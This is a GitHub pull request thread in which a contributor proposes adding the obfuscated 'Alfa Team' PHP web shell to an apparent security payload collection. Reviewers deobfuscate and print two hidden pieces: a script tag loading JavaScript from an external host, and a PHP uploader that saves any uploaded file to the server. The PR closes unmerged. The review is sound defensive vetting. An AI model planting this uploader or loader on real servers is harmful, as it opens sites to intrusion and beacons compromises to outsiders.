### PR TITLE
Add file 'Web-Shells/PHP/alfa.php'

### PR DESCRIPTION
**Pull request by BlackReaperSK**
Adds Alfa Team Webshell

### CODE REVIEW

**Comment by g0tmi1k** [comment]
Thanks for the suggestion @BlackReaperSK 

Is there a source to this?

It looks like there is some obfuscation on it - so will need to find the time to check

**Comment by sethludwig** [comment]
Deobfuscated javascript at the top results in the following:

`<script>document.write(unescape('<script src="https://hackingtool.net/logs/cz/js/">'))</script>
`

Which appears to load javascript from an external URL. Would not recommend committing this shell without stripping that first.

**Comment by molangning** [comment]
Found it hosting the shell on the same domain: https://hackingtool.net/tags/alfa-v4-shell

My best guess is that url is for tracking the usage on the client side.

**Comment by sethludwig** [comment]
Line 913 Decodes to:
`<?php
echo "<title>Solevisible Uploader</title>\n<body bgcolor=#000000>\n<br>\n<center><font color=\"white\"><b>Your Ip Address is</b> <font color=\"white\"></font></center>\n<big><font color=\"#7CFC00\"><center>\n";
echo $_SERVER['REMOTE_ADDR'];
echo "</center></font></a><font color=\"#7CFC00\"><br><br><br><center><font color=\"#7CFC00\"><big>Solevisible Upload Area</big></font></a><font color=\"#7CFC00\"></font></center><br>\n<center><form method='post' enctype='multipart/form-data' name='uploader'>";
echo '<input type="file" name="file" size="45"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>';
if(isset($_POST['_upl']) && $_POST['_upl'] == "Upload"){
    if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b><font color="#7CFC00"><center>Upload Successfully :)</font></a><font color="#7CFC00"></b><br><br>';
    } else {
        echo '<b><font color="#7CFC00"><center>Upload failed :(</font></a><font color="#7CFC00"></b><br><br>';
    }
}
echo '<center><span style="font-size:30px; background: url(&quot;http://solevisible.com/images/bg_effect_up.gif&quot;) repeat-x scroll 0% 0% transparent; color: red; text-shadow: 8px 8px 13px;"><strong><big><big>solevisible@gmail.com</big></big></strong></span></center>';
?>`

Again, calling external resources and beaconing the existence of the shell. The functionality here provides the shell with an upload form and is harmless beyond loading a background image.

**Comment by BlackReaperSK** [comment]
Hello friends

Sorry for the delay, I ended up not seeing the PR development. Really, the code is obfuscated and making very strange calls. I hadn't noticed this, as I tested it a few times and had no problems. I will be finalizing this PR for a more detailed future analysis.

**Pull request closed without merging**
